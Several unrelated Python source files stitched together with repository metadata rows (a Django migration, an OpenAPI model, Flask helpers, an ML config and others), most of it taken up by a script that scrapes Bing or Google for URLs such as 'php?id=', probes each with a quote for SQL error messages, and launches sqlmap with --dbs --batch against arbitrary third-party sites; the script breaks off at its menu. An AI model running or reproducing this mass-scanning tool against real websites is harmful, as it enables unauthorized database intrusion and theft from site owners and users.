# df3 = pd.DataFrame(df_ff.values.tolist(), index=df_ff.index)
# print("**"*50)
# print(type(df), type(df_ff), type(df3))
# print(df)
# print(df_ff)
# print(df_ff.values.tolist())
# print(df3)
# print("**" * 50)
# print("FEATURE-NAMES", feature_names)
df3.columns = feature_names
# multiple rows to one row
output = df3.unstack().to_frame().sort_index(level=1).T
output.columns = [f'{j}_{i}' for i, j in output.columns]
basic_df = pd.DataFrame([[timestamp, localtime, user, int(version), start_time, end_time]],
columns=['timestamp', 'localtime', 'user', 'version', 'start_time', 'end_time'])
# df.insert(loc=0, columns=, value=basic_cols)
return basic_df.assign(**output)
return self.compute(get_fft_features, windowDuration=windowDuration, slideDuration=slideDuration,
groupByColumnName=groupByColumnName, startTime=startTime) | 44.456081 | 357 | 0.614028 | [
"BSD-2-Clause"
] | MD2Korg/CerebralCortex-2.0 | cerebralcortex/markers/brushing/features.py | 13,159 | Python |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('addressbook', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='address',
name='country',
field=models.CharField(max_length=3, verbose_name='country'),
),
]
| 21 | 73 | 0.609524 | [
"BSD-3-Clause"
] | 7wonders/django-addresses | addressbook/migrations/0002_auto_20150903_2227.py | 420 | Python |
# coding: utf-8
"""
Files
Upload and manage files. # noqa: E501
The version of the OpenAPI document: v3
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from hubspot.files.files.configuration import Configuration
class NextPage(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {"after": "str", "link": "str"}
attribute_map = {"after": "after", "link": "link"}
def __init__(self, after=None, link=None, local_vars_configuration=None): # noqa: E501
"""NextPage - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._after = None
self._link = None
self.discriminator = None
self.after = after
if link is not None:
self.link = link
@property
def after(self):
"""Gets the after of this NextPage. # noqa: E501
:return: The after of this NextPage. # noqa: E501
:rtype: str
"""
return self._after
@after.setter
def after(self, after):
"""Sets the after of this NextPage.
:param after: The after of this NextPage. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and after is None: # noqa: E501
raise ValueError("Invalid value for `after`, must not be `None`") # noqa: E501
self._after = after
@property
def link(self):
"""Gets the link of this NextPage. # noqa: E501
:return: The link of this NextPage. # noqa: E501
:rtype: str
"""
return self._link
@link.setter
def link(self, link):
"""Sets the link of this NextPage.
:param link: The link of this NextPage. # noqa: E501
:type: str
"""
self._link = link
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items()))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, NextPage):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, NextPage):
return True
return self.to_dict() != other.to_dict()
| 27.385185 | 139 | 0.583717 | [
"Apache-2.0"
] | Catchoom/hubspot-api-python | hubspot/files/files/models/next_page.py | 3,697 | Python |
import os
import sys
import pandas as pd
import numpy as np
import pdb
import torch
import torch.nn as nn
import torch.nn.functional as F
sys.path.insert(1,"../")
sys.path.insert(1,"../../")
sys.path.insert(1,"../../../")
sys.path.insert(1,"../../../../")
sys.path.insert(1,"../../../../../")
from config_u import base
from data_generators import cpmg_generator_1A
from load_fully_quantified_cpmg_data import fq_v_ppm_spectra, fq_v_spectra, fq_v_statistics, fq_v_quant, fq_v_class_labels, fq_v_metabolite_names, fq_v_fold_dct, SEED
from metabolite_mapping import dataset2folder, folder2dataset
# task configuration
task = "gaba"
dataset_task = folder2dataset[task]
task_target_idx = fq_v_metabolite_names.index(dataset_task)
# data configuration
ppm_spectra = fq_v_ppm_spectra
spectra = fq_v_spectra
statistics = fq_v_statistics
quant = fq_v_quant[:,task_target_idx].reshape((-1,1))
class_labels = fq_v_class_labels
metabolite_names = [fq_v_metabolite_names[task_target_idx]]
fold_dct = fq_v_fold_dct
K = 5
generator = cpmg_generator_1A
# save and log configuration
model_name = f"full_ppm_spectrum_network_per_metabolite/{task}/seed_{SEED}/"
model_base_path = os.path.join(base, "models/cpmg/automated_metabolite_quantification/"+model_name)
log_base_path = os.path.join(base, "logs/cpmg/automated_metabolite_quantification/"+model_name)
plot_base_path = os.path.join(base, "plots/cpmg/automated_metabolite_quantification/"+model_name)
# neural network model configuration
num_epochs = 2000
weight_seed = SEED
hp_space = {
"ETA": 10**-2.1,
"weight_decay": 0.00001
}
# gpu/cpu device selection
gpu_id = int(input("GPU index: "))
if torch.cuda.is_available():
device = torch.device(f"cuda:{gpu_id}")
print(f"GPU {gpu_id} is available")
else:
device = torch.device("cpu")
print("GPU is not available")
# Quantification model
class Model(nn.Module):
def __init__(self):
super(Model, self).__init__()
self.all_mutual = nn.Linear(1401, 192)
self.m1 = nn.Linear(192,1)
def forward(self, x):
inp = F.relu(self.all_mutual(x))
m1 = F.relu(self.m1(inp)).squeeze()
return m1
# weight initialization
def initialize_weights(m):
if type(m) == nn.Linear:
torch.nn.init.kaiming_uniform_(m.weight)
m.bias.data.fill_(0.01)
# measurement metric and timing storage
metric_names = ["mae", "mse", "mape", "r2", "absolute_percentage_error"]
metrics = {}
for name in metric_names:
metrics[name] = {}
for metabolite_name in metabolite_names:
metrics[name][metabolite_name] = []
timing_mode = ["train", "test"]
runtime = {}
for mode in timing_mode:
runtime[mode] = [] | 32.069767 | 167 | 0.705584 | [
"MIT"
] | ciceklab/targeted_brain_tumor_margin_assessment | train_with_your_data/scripts/cpmg/automated_metabolite_quantification/full_ppm_spectrum_network_per_metabolite/gaba/config.py | 2,758 | Python |
from flask import session, jsonify, redirect, request, Response, abort
from flask_login import current_user
from werkzeug.utils import secure_filename
from functools import wraps
from srht.objects import User
from srht.database import db, Base
from srht.config import _cfg
import json
import os
import urllib
import requests
import xml.etree.ElementTree as ET
import hashlib
def firstparagraph(text):
try:
para = text.index("\n\n")
return text[:para + 2]
except:
try:
para = text.index("\r\n\r\n")
return text[:para + 4]
except:
return text
def with_session(f):
@wraps(f)
def go(*args, **kw):
try:
ret = f(*args, **kw)
db.commit()
return ret
except:
db.rollback()
db.close()
raise
return go
def loginrequired(f):
@wraps(f)
def wrapper(*args, **kwargs):
if not current_user or not current_user.approved:
return redirect("/login?return_to=" + urllib.parse.quote_plus(request.url))
else:
return f(*args, **kwargs)
return wrapper
def adminrequired(f):
@wraps(f)
def wrapper(*args, **kwargs):
if not current_user or not current_user.approved:
return redirect("/login?return_to=" + urllib.parse.quote_plus(request.url))
else:
if not current_user.admin:
abort(401)
return f(*args, **kwargs)
return wrapper
def json_output(f):
@wraps(f)
def wrapper(*args, **kwargs):
def jsonify_wrap(obj):
jsonification = json.dumps(obj)
return Response(jsonification, mimetype='application/json')
result = f(*args, **kwargs)
if isinstance(result, tuple):
return jsonify_wrap(result[0]), result[1]
if isinstance(result, dict):
return jsonify_wrap(result)
if isinstance(result, list):
return jsonify_wrap(result)
# This is a fully fleshed out response, return it immediately
return result
return wrapper
def cors(f):
@wraps(f)
def wrapper(*args, **kwargs):
res = f(*args, **kwargs)
if request.headers.get('x-cors-status', False):
if isinstance(res, tuple):
json_text = res[0].data
code = res[1]
else:
json_text = res.data
code = 200
o = json.loads(json_text)
o['x-status'] = code
return jsonify(o)
return res
return wrapper
def file_link(path):
return _cfg("protocol") + "://" + _cfg("domain") + "/" + path
def disown_link(path):
return _cfg("protocol") + "://" + _cfg("domain") + "/disown?filename=" + path
# https://stackoverflow.com/questions/4453602/how-to-find-the-mountpoint-a-file-resides-on/4453715#4453715
def find_mount_point(path):
path = os.path.abspath(path)
while not os.path.ismount(path):
path = os.path.dirname(path)
return path
| 27.106195 | 106 | 0.588965 | [
"MIT"
] | prplecake/legacy.sr.ht | srht/common.py | 3,063 | Python |
"""
For...in em Python
Iterando strings com for...in
função range recebe esses argumentos (start=0, stop, step=1)
"""
texto = input('informe seu CPF: ')
texto_novo = ''
for letra in range(len(texto)):
if letra % 3 == 0:
texto_novo += '.' + texto[letra]
continue
texto_novo += texto[letra]
print(texto_novo[1:]) | 19.941176 | 60 | 0.625369 | [
"MIT"
] | KaicPierre/Curso-de-Python3 | basico/aula019/aula019.py | 341 | Python |
#!/usr/bin/python python3
#
# Python script for finding websites which are prone to SQL injections
# Do crawling on bing or google for possible vuln urls
# Check url with qoute ' and catch error messages
# Run sqlmap against urls
#
# License:
# MIT - (c) 2016 ThomasTJ (TTJ)
#
import sys # Quit the shiat
import os # Working with files and starting sqlmap
import re # Searching web results for vuln
import requests # Calling websites
import urllib.parse # Parsing url encoding for search
import shutil # Checking if SQLmap is installed
import psutil # Checking possible VPN connection
import http.client # Ping to check network connection
import random # Shuffle between user agents
import time # Printing time when scraping and checking urls
from time import sleep # Multiple use cases, e.g. sleep between requests
from bs4 import BeautifulSoup # Working with website date
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
ITALIC = '\x1B[3m'
# Variables which needs to be defined
filenameRawUrl = "0"
filenameVulnUrl = "0"
def LoadUserAgents(uafile="user_agents.txt"):
# uafile : string, path to text file of user agents, one per line
uas = []
with open(uafile, 'rb') as uaf:
for ua in uaf.readlines():
if ua:
uas.append(ua.strip()[1:-1-1])
random.shuffle(uas)
return uas
def inputSearchUrls():
print("\n" + bcolors.HEADER)
print(" #===================================#")
print(" # #")
print(" # Find urls which might is vuln for #")
print(" # SQL injections #")
print(" # #")
print(" #===================================#")
print("\n" + bcolors.ENDC)
print(" Basesearch could be: php?id=, php?cat=, e.g.\n")
# =================================
# Base input
# =================================
# @type basesearch: str
# @param basesearch: Query string. Must NOT be url-encoded.
basesearch = input(" Enter base search string: " + bcolors.OKBLUE)
# @type searchprovider: str
# @param searchprovider: Who should perform the search.
searchprovider = input(bcolors.ENDC + " Bing or Google (b/g): " + bcolors.OKBLUE)
if searchprovider.lower() not in ('b', 'g'):
print(bcolors.WARNING + " - Wrong input - only 'b' and 'g' allowed. Using 'b'")
searchprovider = 'b'
# @type maxperpage: int/str (changed to string)
# @param maxperpage: Max results returned per page
maxperpage = input(bcolors.ENDC + " Results per page: " + bcolors.OKBLUE)
if not maxperpage.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 20")
maxperpage = 20
# @type maxpages: int
# @param maxpages: Max pages to loop through
maxpages = input(bcolors.ENDC + " Number of pages: " + bcolors.OKBLUE)
if not maxpages.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 10")
maxpages = 10
# @type startpage: int
# @param startpage: First page to look in
startpage = input(bcolors.ENDC + " Start pages: " + bcolors.OKBLUE)
if not startpage.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 0")
startpage = 0
if int(startpage) > 0:
startpage = (int(startpage) - 1)
# @type timeout: int
# @param timeout: Sleep between request
timeout = input(bcolors.ENDC + " Enter pause between requests: " + bcolors.OKBLUE)
if not timeout.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 6")
timeout = 6
# @type savesearch: str
# @param savesearch: Save the shiat to a file
savesearch = input(bcolors.ENDC + " Save search (y/N): " + bcolors.OKBLUE)
if savesearch.lower() not in ('', 'y', 'n'):
print(bcolors.WARNING + " - Wrong input - only 'y' and 'n' allowed. Using 'n'")
savesearch = 'n'
# @type filename: str
# @param filename: Filename for file containing the search results
if savesearch.lower() == "y":
filename = input(bcolors.ENDC + " Filename for search: " + bcolors.OKBLUE)
if not os.path.isfile(filename):
os.mknod(filename)
else:
appendtofile = input(bcolors.ENDC + " File exists, append (Y/n): " + bcolors.OKBLUE)
if appendtofile == "n":
print(bcolors.WARNING + " - User disallowed appending to resultfile")
print(bcolors.WARNING + " - Please try again with another filename")
print(bcolors.WARNING + " - Exiting")
sys.exit()
else:
filename = ""
filename = "tmpurllist"
# =================================
# Make variables ready to use
# =================================
count = str(maxperpage)
startpage = int(startpage)
pages = (int(maxpages) + startpage)
sleeptime = int(timeout)
string = str(basesearch)
stringurl = urllib.parse.quote_plus(string)
print(bcolors.ENDC + "\n [*]:: Searching")
print(bcolors.HEADER + bcolors.BOLD + "\n" + " [+] Results" + bcolors.ENDC)
searchUrlForString(searchprovider, count, startpage, pages, sleeptime, string, stringurl, savesearch, filename)
def searchUrlForString(searchprovider, count, startpage, pages, sleeptime, string, stringurl, savesearch, filename):
# =================================
# Loop through pages
# =================================
for start in range(startpage, pages):
# try:
# =========================
# Bing search
# =========================
if searchprovider == "b":
pagenr = int(start)*int(count)+1
address = "http://www.bing.com/search?q=instreamset:(url title):" + stringurl + "&count=" + count + "&first=" + str(pagenr)
print(" [*] Page number: " + str(int(start)+1))
# Loading random useragent
uas = LoadUserAgents()
ua = random.choice(uas) # select a random user agent
headers = {"Connection": "close", "User-Agent": ua}
r = requests.get(address, headers=headers)
soup = BeautifulSoup(r.text, 'lxml')
for d in soup.find_all('h2'):
for a in d.find_all('a', href=True):
if string in a['href']:
print(
bcolors.OKGREEN
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [+] " + a['href'] + bcolors.ENDC
)
if filename:
with open(filename, 'a') as file:
file.write(a['href'] + "\n")
elif "0.r.msn." in a['href']:
pass
else:
pass
sleep(sleeptime)
# =========================
# Google search
# =========================
elif searchprovider == "g":
pagenr = int(start)*int(count)
address = "https://www.google.dk/search?q=" + stringurl + "&num=" + count + "&start=" + str(pagenr)
# address = "https://www.google.dk/search?q=inurl%3A" + stringurl + "&num=" + count + "&start=" + str(pagenr)
print(" [*] Page number: " + str(int(start)+1))
# Loading random useragent
uas = LoadUserAgents()
ua = random.choice(uas) # select a random user agent
headers = {"Connection": "close", "User-Agent": ua}
r = requests.get(address, headers=headers)
soup = BeautifulSoup(r.text, 'lxml')
for d in soup.find_all('cite'):
url = d.text
if string in url:
print(
bcolors.OKGREEN
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [+] " + url + bcolors.ENDC
)
if filename == "y":
with open(filename, 'a') as file:
file.write(url + "\n")
sleep(sleeptime)
try:
print("")
# =============================
# Error, end, exit
# =============================
except KeyboardInterrupt:
print(bcolors.FAIL + " User input - Ctrl + c" + bcolors.ENDC)
quitnow = input(bcolors.ENDC + bcolors.BOLD + " Exit program (y/N): " + bcolors.OKBLUE)
if quitnow == "y":
print(bcolors.ENDC + " // Exiting\n\n")
sys.exit()
else:
print(bcolors.ENDC + " // Continuing\n\n")
except:
print(bcolors.FAIL + " ERROR!!! " + bcolors.ENDC)
# =================================
# Done - sum it up
# =================================
print("\n Done scraping")
with open(filename) as f:
resultsnumber = sum(1 for _ in f)
if savesearch == "y":
print(" Scraping saved in file: " + filename)
print(" Total saved urls: " + str(resultsnumber))
else:
print(" Total urls collected: " + str(resultsnumber))
# Check urls? Next function activates..
checkurls = input(bcolors.ENDC + "\n Would you like to check urls for vuln (Y/n): " + bcolors.OKBLUE)
if checkurls.lower() not in ('', 'y', 'n'):
print(bcolors.WARNING + " - Wrong input - only 'y' and 'n' allowed. Using 'y'")
checkurls = "y"
if checkurls == "n":
print(bcolors.ENDC + " // Exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
else:
checkUrlsForVuln(filename)
def checkUrlsForVuln(filenameRawUrl):
print("\n\n\n" + bcolors.HEADER)
print(" #===============================#")
print(" # #")
print(" # Check if urls is vuln for #")
print(" # SQL injection #")
print(" # #")
print(" #===============================#")
print("\n" + bcolors.ENDC)
# =================================
# Base input
# =================================
# Base input
if filenameRawUrl != "0":
print(" Filepath from run is still in memory: " + filenameRawUrl)
urlfileChoose = input(bcolors.ENDC + " (i)nput new filename, or (u)se from memory (i/U): " + bcolors.OKBLUE)
if urlfileChoose not in ('i', 'u'):
print(bcolors.WARNING + " - Using from memory")
urlfileChoose = 'u'
if urlfileChoose == 'u':
urlfile = filenameRawUrl
else:
# @type urlfile: str
# @param urlfile: File with the raw urls to check.
urlfile = input(bcolors.ENDC + " Filename with urls: " + bcolors.OKBLUE)
else:
# @type urlfile: str
# @param urlfile: File with the raw urls to check.
urlfile = input(bcolors.ENDC + " Filename with urls: " + bcolors.OKBLUE)
if not os.path.isfile(urlfile):
print(bcolors.FAIL + " Specified file does not exist.")
print(bcolors.FAIL + " Exiting")
sys.exit()
# @type verboseactive: str
# @param verboseactive: Verboselevel.
verboseactive = input(bcolors.ENDC + " Verboselevel (0, 1, 2): " + bcolors.OKBLUE)
if not verboseactive:
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 0")
verboseactive = "0"
# @type savesearch: str
# @param savesearch: Save the scan to file.
savesearch = input(bcolors.ENDC + " Save search (y/N): " + bcolors.OKBLUE)
if savesearch.lower() not in ('', 'y', 'n'):
print(bcolors.WARNING + " - Wrong input - only 'y' and 'n' allowed. Using 'y'")
savesearch = 'y'
# @type filename: str
# @param filename: Filename for the shiat.
if savesearch == "y":
filename = input(bcolors.ENDC + " Filename for results: " + bcolors.OKBLUE)
if not filename:
print(bcolors.WARNING + " - Wrong input - using 'vulnurls' as filename")
filename = "vulnurls"
if not os.path.isfile(filename):
os.mknod(filename)
else:
appendtofile = input(bcolors.ENDC + " File exists, append (Y/n): " + bcolors.OKBLUE)
if appendtofile == "n":
print(" User disallowed appending to resultfile")
print(" Please try again with another filename")
print(" Exiting")
sys.exit()
else:
filename = "0"
print(bcolors.ENDC + "\n [*]::Reading file\n")
print(" [*] Connecting\n")
# =================================
# Loop through urls and add a qoute
# =================================
with open(urlfile) as fileorg:
for line in fileorg:
checkMY1 = 0
checkMY2 = 0
checkMY3 = 0
checkMY4 = 0
checkMS1 = 0
checkMS2 = 0
checkMS3 = 0
checkOR1 = 0
checkOR2 = 0
checkOR3 = 0
checkPO1 = 0
checkPO2 = 0
try:
# Get data
url = line + "'"
print(
" ["
+ time.strftime("%H:%M:%S")
+ "] [*] " + line.strip('\n')
)
# Loading random useragent
uas = LoadUserAgents()
ua = random.choice(uas) # select a random user agent
headers = {"Connection": "close", "User-Agent": ua}
r = requests.get(url, headers=headers)
soup = BeautifulSoup(r.text, 'lxml')
# Check if vuln - might updated indicationstrings according to
# MySQL
checkMY1 = len(soup.find_all(text=re.compile('check the manual that corresponds to your MySQL')))
checkMY2 = len(soup.find_all(text=re.compile('SQL syntax')))
checkMY3 = len(soup.find_all(text=re.compile('server version for the right syntax')))
checkMY4 = len(soup.find_all(text=re.compile('expects parameter 1 to be')))
# Microsoft SQL server
checkMS1 = len(soup.find_all(text=re.compile('Unclosed quotation mark before the character string')))
checkMS2 = len(soup.find_all(text=re.compile('An unhanded exception occurred during the execution')))
checkMS3 = len(soup.find_all(text=re.compile('Please review the stack trace for more information')))
# Oracle Errors
checkOR1 = len(soup.find_all(text=re.compile('java.sql.SQLException: ORA-00933')))
checkOR2 = len(soup.find_all(text=re.compile('SQLExceptionjava.sql.SQLException')))
checkOR3 = len(soup.find_all(text=re.compile('quoted string not properly terminated')))
# Postgre SQL
checkPO1 = len(soup.find_all(text=re.compile('Query failed:')))
checkPO2 = len(soup.find_all(text=re.compile('unterminated quoted string at or near')))
# Verbose level 1
if verboseactive == "1":
print(" [V] Check1 MySQL found: " + str(checkMY1))
print(" [V] Check2 MySQL found: " + str(checkMY2))
print(" [V] Check3 MySQL found: " + str(checkMY3))
print(" [V] Check4 MySQL found: " + str(checkMY4))
print(" [V] Check5 MS SQL found: " + str(checkMS1))
print(" [V] Check6 MS SQL found: " + str(checkMS2))
print(" [V] Check7 MS SQL found: " + str(checkMS3))
print(" [V] Check8 Oracle found: " + str(checkOR1))
print(" [V] Check9 Oracle found: " + str(checkOR2))
print(" [V] Check10 Oracle found: " + str(checkOR3))
print(" [V] Check11 Postgre found: " + str(checkPO1))
print(" [V] Check12 Postgre found: " + str(checkPO2))
# Verbose level 2
if verboseactive == "2":
checkverMY1 = soup.find(text=re.compile('check the manual that corresponds to your MySQL'))
checkverMY2 = soup.find(text=re.compile(r'SQL syntax'))
checkverMY3 = soup.find(text=re.compile(r'server version for the right syntax'))
checkverMY4 = soup.find(text=re.compile('expects parameter 1 to be'))
print(" [V] Check1 MySQL found: " + str(checkverMY1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check2 MySQL found: " + str(checkverMY2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check3 MySQL found: " + str(checkverMY3).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check4 MySQL found: " + str(checkverMY4).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
checkverMS1 = soup.find(text=re.compile('Unclosed quotation mark before the character string'))
checkverMS2 = soup.find(text=re.compile('An unhanded exception occurred during the execution'))
checkverMS3 = soup.find(text=re.compile('Please review the stack trace for more information'))
print(" [V] Check5 MS SQL found: " + str(checkverMS1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check6 MS SQL found: " + str(checkverMS2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check7 MS SQL found: " + str(checkverMS3).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
checkverOR1 = soup.find(text=re.compile('java.sql.SQLException: ORA-00933'))
checkverOR2 = soup.find(text=re.compile('SQLExceptionjava.sql.SQLException'))
checkverOR3 = soup.find(text=re.compile('quoted string not properly terminated'))
print(" [V] Check8 Oracle found: " + str(checkverOR1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check9 Oracle found: " + str(checkverOR2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check10 Oracle found: " + str(checkverOR3).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
checkverPO1 = soup.find(text=re.compile('Query failed:'))
checkverPO2 = soup.find(text=re.compile('unterminated quoted string at or near'))
print(" [V] Check11 Postgre found: " + str(checkverPO1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check12 Postgre found: " + str(checkverPO2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
# If X is vuln
if (checkMY1 > 0 or checkMY2 > 0 or checkMY3 > 0 or checkMY4 > 0 or checkMS1 > 0 or checkMS2 > 0 or checkMS3 > 0 or checkOR1 > 0 or checkOR2 > 0 or checkOR3 > 0 or checkPO1 > 0 or checkPO2):
print(
bcolors.OKGREEN
+ "\n"
+ " Possible vuln url!"
+ "\n"
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [+] "
+ line + bcolors.ENDC
+ "\n"
)
if savesearch == "y":
with open(filename, 'a') as file:
file.write(line)
else:
print(
bcolors.WARNING
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [-] " + line + bcolors.ENDC
)
# Skip X or/and exit
except KeyboardInterrupt:
print(bcolors.FAIL + " [X] " + line + bcolors.ENDC)
quitnow = input(bcolors.ENDC + bcolors.BOLD + " Exit program (y/N): " + bcolors.OKBLUE)
if quitnow == "y":
print(bcolors.ENDC + " // Exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
else:
print(bcolors.ENDC + " // Continuing\n\n")
# Bad X
except:
print(bcolors.FAIL + " [X] " + line + bcolors.ENDC)
# =================================
# Done - sum it up
# =================================
print("\n Done scanning urls")
if savesearch == "y":
with open(filename) as f:
resultsnumber = sum(1 for _ in f)
print(" Scraping saved in file: " + filename)
print(" Total saved urls: " + str(resultsnumber))
if resultsnumber == 0:
print(" No vuln urls, exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
checkurls = input(bcolors.ENDC + "\n Would you like to run the urls through sqlmap (y/N): " + bcolors.OKBLUE)
if checkurls == "y":
try:
os.remove("tmpurllist")
except OSError:
pass
scanUrlsSQLmap(filename)
else:
print(bcolors.ENDC + " // Exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
def scanUrlsSQLmap(filenameVulnUrl):
print("\n\n\n" + bcolors.HEADER)
print(" #===============================#")
print(" # #")
print(" # Scan urls with #")
print(" # SQLmap #")
print(" # #")
print(" #===============================#")
print("\n" + bcolors.ENDC)
# =================================
# Check if sqlmap installed, file, etc.
# =================================
if shutil.which('sqlmap') is None:
print(" SQLmap is not installed on system - can't go on.")
print(" Install sqlmap and run command below (sudo pacman -S sqlmap, sudo apt-get install sqlmap, etc.)")
print(" \nCommand:")
print(" sqlmap -m \"" + filenameVulnUrl + "\n")
else:
if filenameVulnUrl == "0":
print(" No filename in memory, please specify.")
# @type urlfile: str
# @param urlfile: File with the raw urls to check.
filenameVulnUrl = input(bcolors.ENDC + " Filename with urls: " + bcolors.OKBLUE)
if not os.path.isfile(filenameVulnUrl):
print(bcolors.FAIL + " Specified file does not exist.")
print(bcolors.FAIL + " Exiting")
sys.exit()
print(bcolors.ENDC + " SQLmap will be started with arguments dbs, batch, random-agent, 4xthreads.")
fileDestination = (os.getcwd() + "/" + filenameVulnUrl)
command = ('sqlmap -m ' + fileDestination + " --dbs --batch --random-agent --threads 4")
print("Command to execute: " + command)
input(bcolors.ENDC + " Press enter to continue\n")
print(bcolors.ENDC + " Starting SQLmap - follow onscreen instructions")
print(bcolors.BOLD + " Press Ctrl + c to exit\n\n\n")
# RUN SQLMAP !!
os.system(command)
# Not implemented - specify saving destination
# @type savingplace: str
# @param savingplace: Who should perform the search.
# savingplace = input(bcolors.ENDC + " Specify folder where results will be placed: " + bcolors.OKBLUE)
# if savingplace not in ('b', 'g'):
# print(bcolors.WARNING + " - Wrong input - only 'b' and 'g' allowed. Using 'b'")
# savingplace = 'b'
def helpme():
print("\n\n" + bcolors.HEADER)
print(" .---. .---. .-''-. .---. .-------. ,---. ,---. .-''-. ")
print(" | | |_ _| .'_ _ \ | ,_| \ _(`)_ \ | \ / | .'_ _ \ ")
print(" | | ( ' ) / ( ` ) ',-./ ) | (_ o._)| | , \/ , | / ( ` ) ' ")
print(" | '-(_{;}_). (_ o _) |\ '_ '`) | (_,_) / | |\_ /| |. (_ o _) | ")
print(" | (_,_) | (_,_)___| > (_) ) | '-.-' | _( )_/ | || (_,_)___| ")
print(" | _ _--. | ' \ .---.( . .-' | | | (_ o _) | |' \ .---. ")
print(" |( ' ) | | \ `-' / `-'`-'|___ | | | (_,_) | | \ `-' / ")
print(" (_{;}_)| | \ / | \/ ) | | | | \ / ")
print(" '(_,_) '---' `'-..-' `--------``---' '--' '--' `'-..-' ")
print("\n\n" + bcolors.ENDC)
print(" This python script is developed to show, how many vulnerables websites,")
print(" which are laying around on the web. The main focus of the script is to")
print(" generate a list of vuln urls. Please use the script with causing and")
print(" alert the webadmins of vulnerable pages. The SQLmap implementation is")
print(" just for showcasing.")
print("")
print(" The script is divided into 3 main sections.\n")
print(bcolors.BOLD + " # Section 1" + bcolors.ENDC)
print(" In this section you have to provide a search string, which 'connects' to")
print(" the websites database, e.g. 'php?id='. The script then crawls")
print(" Bing or Google for urls containing it. All of the urls can then be saved")
print(" into a file. (Please be aware that you might get banned for crawling to")
print(" fast, remember an appropriate break/sleep between request).")
print(bcolors.ITALIC + " Example of searchs: php?bookid=, php?idproduct=, php?bookid=, php?catid=,")
print(" php?action=, php?cart_id=, php?title=, php?itemid=" + bcolors.ENDC)
print("")
print(bcolors.BOLD + " # Section 2" + bcolors.ENDC)
print(" This section adds a qoute ' to the websites url. If the website is")
print(" prone to SQL injection, we'll catch this with some predefined error")
print(" messages. The script will not add websites for blind SQL injections,")
print(" due to the predefined error messages.")
print("")
print(bcolors.BOLD + " # Section 3" + bcolors.ENDC)
print(" This is just an activation of sqlmap with the bulk argument and no")
print(" user interaction for validation of SQL injection.")
print("")
print("\n")
print(bcolors.BOLD + " Stay safe and help the vulnerables" + bcolors.ENDC)
print("\n")
sys.exit()
def checkConnection():
# Header request for net connectivity
print(bcolors.ENDC + "\n [*] Checking network connection" + bcolors.ENDC)
conn = http.client.HTTPConnection("www.microsoft.com", 80)
try:
conn.request("HEAD", "/")
print(bcolors.OKGREEN + " [+] Network connection seems OK" + bcolors.ENDC)
except:
print(bcolors.FAIL + " [-] Network connection seems down" + bcolors.ENDC)
# Checking for tun0 or ppp
print(bcolors.ENDC + " [*] Checking VPN connection" + bcolors.ENDC)
if re.match(r'tun.', 'tun') or re.match(r'ppp.', 'ppp') not in psutil.net_if_addrs():
print(bcolors.WARNING + " [-] No indication of a VPN connection on tun or ppp found.")
choice = input(bcolors.ENDC + " Continue (y/N): " + bcolors.OKBLUE)
if choice.lower() == "y":
print(bcolors.ENDC + " ")
else:
sys.exit()
else:
print(bcolors.OKGREEN + " [+] Indications of a VPN. Good. Will continue." + bcolors.ENDC)
startpage()
def startpage():
print("\n")
print(bcolors.BOLD + " Please choose your weapon of mass destruction:")
